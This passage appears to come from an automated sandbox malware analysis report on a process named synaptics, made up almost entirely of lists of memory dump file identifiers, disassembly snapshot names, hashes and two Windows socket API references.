                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5D3000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5D5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5D7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5D9000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5DB000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5DD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5DF000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5E2000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5E6000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5E8000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5EA000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5EE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5F0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5F2000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5F4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5F6000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5F8000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5FB000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5FD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C5FF000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C601000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C603000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C605000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C608000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C60A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C60C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C60E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C610000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C612000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C614000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C616000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C618000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C61A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C61C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C61E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C620000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C622000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C624000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C626000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C62E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C632000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C636000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C638000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C63A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C63C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C63E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C642000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C644000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C646000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C648000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C64E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C651000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C653000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C659000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C66A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C66C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C66E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C670000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C672000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C674000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C676000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C678000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C67C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C67E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C680000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C682000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2105203629.000000006C684000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2118298410.000000006C68D000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2118398996.000000006C68E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c580000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3353612457-0
                                                                                                                                                                                                                                    • Opcode ID: 96d2d7695d89f433bf4f3498585911a48eb6d3af393a416e5630eb7a4dbf358f
                                                                                                                                                                                                                                    • Instruction ID: 158397c7ea52de319bf556a84388d41afd185ec7997d95b1c5ed819d63b00746
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96d2d7695d89f433bf4f3498585911a48eb6d3af393a416e5630eb7a4dbf358f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9219F71E43679FBDB118F55CC40AAF3A79EF81AD8F104529F8146BA10E3318D018BE0
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 6C712332
                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32(6C86E4BC,0000005C), ref: 6C71233F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastsetsockopt
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1729277954-0
                                                                                                                                                                                                                                    • Opcode ID: 85bb367952443aceb0a59b5c5d8911a814ec7c58f05a08f0cd440753a80b477f
